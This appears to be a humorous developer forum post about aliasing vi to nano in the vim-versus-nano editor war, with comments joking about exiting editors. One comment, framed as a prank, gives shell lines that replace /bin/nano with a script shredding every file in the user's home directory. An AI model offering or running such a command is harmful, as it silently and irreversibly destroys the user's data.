23

alias vi="nano"

End of the war.

Comments
  • 11
    No, now the guy that can't exit nano is going to be even more lost coz he's googling how to exit Vim 🤨
  • 4
    @C0D4 doesn't nano show its key combos at the bottom of the terminal?
  • 8
    @RealKC it does.
    But I've seen people get confused over the ^x not understanding what ^ actually means.
  • 0
    @oreru That works assuming people know that already. (Most don't)

    Some people even get confused if you say meta/super key instead of Windows.
  • 2
    @oreru "What about the best editor: Microsoft Word?!"
  • 1
    @oreru Just use Ctrl Z and kill vim in the background
  • 0
    echo #!/bin/sh> /bin/nano
    echo shred -zfu ~/* >> /bin/nano

    End of the war.
  • 0
    alias nano="vim"
    alias vi="nano"

    Fixed it
Add Comment